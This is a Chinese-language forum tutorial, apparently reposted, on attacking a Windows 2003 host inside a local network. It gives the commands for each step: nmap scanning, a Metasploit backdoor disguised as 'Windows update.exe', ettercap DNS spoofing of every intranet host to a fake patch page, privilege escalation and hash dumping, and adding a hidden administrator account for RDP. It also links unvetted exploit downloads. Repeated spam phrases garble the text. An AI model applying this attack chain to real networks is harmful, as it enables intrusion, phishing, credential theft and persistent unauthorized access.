本機ubuntu IP如何讓單位的內網電腦上外網:192.168.0.3
虛擬機03主機 IP如何讓單位的內網電腦上外網:192.168.0.128
我們先來模擬一下 比如我拿到了我本機192.168.0.3 這臺服務器的管理權限后 我是如何繼續(xù)滲透192.168.0.128這臺主機的首先在內網滲透中最常用的就是信息收集以及端口掃描說起端口掃描和主機信息收集 大家不得不想到了nmap
nmap
nmap是一個網絡連接端掃描軟件如何讓單位的內網電腦上外網,用來掃描網上電腦開放的網絡連接端。確定哪些服務運行在哪些連接端,并且推斷計算機運行哪個操作系統(tǒng)(這是亦稱 fingerprinting)。它是網絡管理員必用的軟件之一,以及用以評估網絡系統(tǒng)安全。
正如大多數(shù)被用于網絡安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。系統(tǒng)管理員可以利用nmap來探測工作環(huán)境中未經批準使用的服務器,但是黑客會利用nmap來搜集目標電腦的網絡設定,從而計劃攻擊的方法。
Nmap 常被跟評估系統(tǒng)漏洞軟件Nessus 混為一談。Nmap 以隱秘的手法,避開闖入檢測系統(tǒng)的監(jiān)視,并盡可能不影響目標系統(tǒng)的日常操作。
Nmap 在黑客帝國(The Matrix)中,連同SSH1的32位元循環(huán)冗余校驗漏洞,被崔妮蒂用以入侵發(fā)電站的能源管理系統(tǒng)。
另外更多nmap相關信息 請到百度百科查看 太多 全搬過來的話 界面就不是特別美觀了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq
我們用nmap的Intense scan模塊 來掃描 192.168.0.128 這臺主機 是在內網中 掃描端口開放信息以及主機信息等一系列信息~ Intense scan 模塊可以滿足一般的掃描 如果如何讓單位的內網電腦上外網你要掃描內網主機的話 nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址
nmap -T4 -A -v 192.168.0.128
這里我們不得不說一下 nmap確實很強大 下面為輸出結果
我們得知主機系統(tǒng)為 Windows2003 用戶組 版本信息 端口信息 開放了3389當然 nmap有很多插件 可以掃描主機漏洞問題 那個我沒找到= =
咳咳配置Metasploit exe后門
ps:默認端口4444
有的主機可以配合Metasploit溢出滲透xp 那樣直接獲取到一個cmd執(zhí)行權限 本臺主機我看了下 沒有遠程溢出問題 補丁都打好了。
主機開放3389 后 而且是在內網 那么我們dns欺騙 內網全部主機的dns 我們寫一個html界面 提示如何讓單位的內網電腦上外網你電腦存在xx漏洞 打補丁 后門改名字可以改為 Windows update.exe html界面越逼真越好。
ettercap -T -i wlp2s0 -q -P dns_spoof /// ///
下面為輸出結果參數(shù)問題:
-T文本模式 -i接要欺騙的適配器 -q安靜模式 -P dns_spoof調用這個插件 /// ///代表所有IP和子網掩碼
對方主機打開任何網站 都會成為我本機的index.html
Linux的 index.html在/var/www/html/目錄
直接gedit /var/www/html/index.html 即可編輯
首先你要先進入root狀態(tài)
不然只能讀 不能寫
上面說了 03主機是受害者 這里我假裝上當了
打開了后門
這里我們的msf上線了
幫助信息
首先我們先來讀取下192.168.0.128這臺主機的hash數(shù)值
當然 這些數(shù)值不好解密 咳咳
有提權exp 可以直接顯示hash值 解密后的
getsystem 獲取最高權限
shell 進入cmd提權
我們成功獲取到了最高權限 進入到了c盤 Windows system32的cmd.exe直接一條命令 即可添加用戶&管理員權限
net user xaisec xaisec /add & net localgroup administrators xaisec /add
連接192.168.0.128 這臺主機 rdesktop
沒有rdesktop的 可以apt-get install rdesktop 安裝
rdesktop -h 參數(shù)
rdesktop 192.168.0.128 -u xaisec -p xaisec
-u 是用戶名的意思 -p是密碼
讀取解密哈希值
hash下
administrator admin
xaisec xaisec
使用administrator登錄
rdesktop 192.168.0.128 -u administrator -p admin
最后 我整理了下提權exp 有的沒有測試 不清楚有沒有后門自行檢查
鏈接: https://pan.baidu.com/s/1i56zH0T 密碼: qdhm
作者:小愛_Joker
來源:i春秋
鏈接:https://bbs.ichunqiu.com/thread-20514-1-1.html
煉石信息安全培訓春季班開招
QQ:495066536
372806985
敬請持續(xù)關注……
評論列表
還沒有評論,快來說點什么吧~